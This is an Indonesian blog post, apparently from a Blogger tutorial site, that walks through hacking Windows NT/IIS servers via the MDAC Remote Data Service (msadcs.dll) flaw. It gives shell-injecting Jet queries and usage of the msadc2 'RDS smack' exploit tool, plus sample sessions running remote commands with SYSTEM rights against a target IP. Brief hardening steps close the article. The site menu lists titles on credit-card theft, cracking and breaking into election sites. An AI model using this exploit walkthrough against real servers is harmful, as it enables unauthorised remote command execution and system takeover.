TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » Hacking NT Server Melalui Remote Data Service

    Hacking NT Server Melalui Remote Data Service

    Dengan pertimbangan demi kejayaan ilmu pengetahuan dan pendidikan, akhirnya saya mencoba memaksakan diri untuk menjelaskan teknik hacking NT Server melalui RDS (Remote Data Service) ini.

    Tentu dengan maksud agar para administrator bisa lebih secure menjaga servernya dan juga sebagai sarana menyebarkan ilmu pengetahuan.Teknik hacking di NT sebenarnya bermacam-macam,  diantaranya adalah:

    I.   Initial Access Strategy

    •   NETBIOS Shares using Microsoft Executables
    •   NAT The NetBios Auditing Tool
    II.  RDS Exploitation
    III. Frontpage Exploitation with Frontpage Extensions
    IV. Registry Vulneralbility

    • Gaining access to registry with the AT.EXE command (local)
    • EGEDT32.EXE and REGEDIT.EXE
    • REGINI.EXE and REGDMP.EXE remote registry editing tools
    V.  Trojan .Ink
    VI. SAM (Security Access Manager) Touching
    VII. PWDump Technique

    Dari teknik-teknik di atas yang menurut penulis paling menarik adalah teknik hacking melalui RDS (Remote Data Service). Teknik ini sebenarnya tidaklah baru karena beberapa hacker juga sudah familiar dengan cara ini, mungkin karena keberadaan unicode yang begitu banyak dan ampuhnya menghajar server-server NT (IIS 4.0/5.0) menyebabkan teknik ini tidak begitu populer. Di tulisan saya ini nanti saya juga akan mencoba menjelaskan bagaimana teknik pengamanannya.

    Berbicara tentang RDS (Remote Data Service) tentu kita tidak akan bisa terlepas dengan induknya yaitu MDAC (Microsoft Data Access Components) dimana RDS adalah salah satu komponen dari MDAC. Perlu saya jelaskan sedikit tentang RDS (Remote Data Service). Jika Anda menginstall Windows NT 4.0 secara default aplikasi MDAC akan ikut terinstall. Windows NT 4.0 menggunakan MDAC versi 1.5. Berbicara tentang versi, ada dua versi MDAC yang vulnerable yaitu:

    • MDAC versi 1.5
    • MDAC versi 2.0
    Terus bagaimana teknik ini bisa melakukan access terhadap target?. Perlu Anda pahami juga bahwa RDS dalam kerjanya melakukan koneksi dengan ODBC (Open Database Conectivity) jadi sangat mungkin untuk mengeksekusi remote command melalui ‘QUERY’. Di sini saya tidak akan menjelaskan hubungan RDS dengan MS Jet Engine dan Jet Pipe/VBA (Visual Basic Aplication) tapi yang jelas untuk melaksanakan query, RDS memerlukan MS Jet Engine dan Jet Pipe/VBA.

    Tapi bagaimana cara mengeksekusi command tersebut?. Mungkin Anda pernah mendengar atau melihat satu file di NT yang bernama MSADCS.DLL dan di IIS Webserver, file ini di sertakan juga. Melalui file MSADCS.DLL atau yang dikenal sebagai ActiveDataFactory/AdvancedDataFactory kita bisa melakukan eksekusi empat command database yaitu:

    Query
    CreateRecordSet
    ConvertToString
    SubmitChanges

    Tapi di sini kita hanya memerlukan dua buah command yaitu ‘QUERY’ dan ‘SUBMITCHANGES’. Kemudian kelebihan dari QUERY adalah kemampuannya untuk mengakses database di luar wilayahnya, intinya QUERY dapat memasukan informasi/data milik kita ke dalam databasenya. Contoh database yang di maksud adalah file ‘btcustmr.mdb’. Dengan menggunakan Microsoft Access Driver kita bisa meng-query ‘btcustmr.mdb’ dan membuat table yang berisi akses terhadap command shell. Contoh query
    di bawah ini (not all showed!):

    Select * from Customers where City='shell("$command")’
    Create table ABC (B int, C varchar(10))
    Select * from ABC where C='shell("$command")'

    Oke sekarang kita akan mencoba mempraktikan konsep hacking di atas dengan bantuan satu script buatan Rain Forest Puppy (r.f.p) yang dalam pembuatannya dia di bantu oleh ADM dan Couple dari L0pt Security.

    C:\> msadc2.exe
    ==========================================
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    -- Property Of Xnuxer Research, Schizoprenic --

    Usage: msadc2.exe -h { -d -X -v }
    - h = host you want to scan (ip or domain)
    - d = delay between calls, default 1 second
    - X = dump Index Server path table, if available
    - N = query VbBusObj for NetBIOS name
    - V = use VbBusObj instead of ActiveDataFactory
    - v = verbose
    - e = external dictionary file for step 5

    -u & lt;\\host\share\file> = use UNC file
    -w = Windows 95 instead of Windows NT
    -c = v1 compatibility (three step query)
    -s = run only step

    Or a -R will resume a (v2) command session

    Cara kerja dari script ini adalah dengan melakukan checking terhadap file ‘msadcs.dll’ di target melalui port 80, kemudian jika di temukan di layar akan muncul tampilan seperti ini:

    C:\> msadc2 –h 192.168.0.24
    ==========================================
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    -- Property Of Xnuxer Research, Schizoprenic --

    Type the command line you want to run (cmd /c assumed):
    cmd /c_

    Jika file ‘msadcs.dll’ tidak di temukan maka yang muncul
    adalah seperti di bawah ini:

    C:\> msadc2 –h 192.168.0.21
    ==========================================
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    -- Property Of Xnuxer Research, Schizoprenic --
    Doh! They're not running IIS.


    Oke sekarang kita akan mencoba mengeksekusi command ‘dir’,
    lihat contoh:

    C:\> msadc2 –h 192.168.0.24
    ==========================================
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    -- Property Of Xnuxer Research, Schizoprenic --
    Type the command line you want to run (cmd /c assumed): cmd /c dir

    Step 1: Trying raw driver to btcustmr.mdb winnt -> c: Success!

    Jika Anda berhasil maka beruntunglah Anda karena telah dapat menguasai system dan perlu di ketahui juga bahwa RDS running dengan authority SYSTEM jadi berhati-hatilah dengan command yang Anda pakai :) .

    CARA MENGAMANKAN SYSTEM
    Di rasa salah juga kalo saya tidak menyertakan cara mengamankan IIS server Anda dari teknik eksploitasi ini.
    Langsung saja, ada beberapa langkah yang bisa Anda lakukan untuk mengantisipasi server Anda dari serangan hacker, cracker dan script kiddies melalui teknik ini, diantaranya adalah:

    Cara cepat dan mudah adalah dengan menghapusseluruh file dan folder yang berada di directory C:\Program Files\Common Files\System\Msadc Men-disable RDS Support.


    Menghapus Key Registry di bawah ini:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch
    Atau upgrade MDAC Anda ke versi 2.1, kemudian Jet Engine 3.5 ke versi 4.0

    Jika empat hal di atas telah Anda lakukan maka amanlah server Anda dari eksploitasi ini. Mudah-mudahan sedikit tulisan ini bisa bermanfaat bagi Anda. Terima Kasih.

    Anda di ijinkan menyebarluaskan informasi ini untuk di publikasikan di manapun juga asal tidak melakukan perubahan terhadap isi dan nama penulis dan juga asal untuk kepentingan penyebaran Ilmu Pengetahuan dan Pendidikan.
    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    0 komentar:

    Poskan Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger